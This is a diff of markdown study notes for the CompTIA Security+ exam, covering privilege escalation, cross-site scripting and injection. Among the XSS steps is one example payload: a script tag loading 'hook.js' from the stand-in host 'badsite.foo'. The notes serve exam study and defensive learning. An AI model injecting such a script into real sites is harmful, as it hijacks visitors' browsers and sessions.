CoreyCBurton/Comptia-sec-601/1.0/Potential Indicators with Application Attack 1.3.md

 # Privilege escalation
-* Gains full access to a system
+- The attacker gains full access to a system

-* exploits a vulnerability
+   - Usally exploits a vulnerability

-* Ussally when one user can access another user

-* Malware can catch any privilage escalation
+   - Malware can catch any privilage escalation

-> CVE-2020-1530 Windows Remote Access Elevation of Privelage vulnerability august 20, 2020
+- **Example** - CVE-2020-1530 Windows Remote Access Elevation of Privelage vulnerability august 20, 2020

 # Cross-site scripting
+- A malicious script hosted on the attacker's site or coded in a link injection onto a trusted site designed to compromise clients browsing the trusted site.
-* Also known as **XSS**
+  - Also known as XSS

-* Orginally associated with a browser security flaws; Information from one site to another could be shared
+  - Orginally associated with a browser security flaws; Information from one site to another could be shared

-* Common web based application developement errors

-* Malware used in javascript

-* Non-persistant XSS attack
+- Process of an XSS attack
+1. The attacker indentifies an input validation vulnerability in a trusted site
+2. The attacker crafts a URL to perform a code injection against the trusted site.
+3. When the user clicks the link, the trusted site returns a page containing the malicious code injected by the attacker

+- **Example** - Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.

+- **Non-persistant XSS attack**
-> seach box is a common source
+    - seach box is a common source
-> Sent through link that activates payload
+    - Sent through link that activates payload
-> Hacker can get session id and more information
+    - Hacker can get session id and more information

-* Persistent XSS attack
+- **Persistent XSS attack**

-> Includes a malicious payload
+    - Includes a malicious payload
-> The malicious message has the virus and everyone gets it when the message is read
+    - The malicious message has the virus and everyone gets it when the message is read
-> There isnt someone targeted; different from non-persistant where the person can be targeted
+    - There isnt someone targeted; different from non-persistant where the person can be targeted
-> Can spread easy through social media
+    - Can spread easy through social media

-> Example- Subaru website gave you a log in token when you entered the website.
+    - **Example** - Subaru website gave you a log in token when you entered the website.
 The log in token never expired, therefore if someone got ahold of this token, theu could log in.

 # Injection
 * Adding your own information in a data stream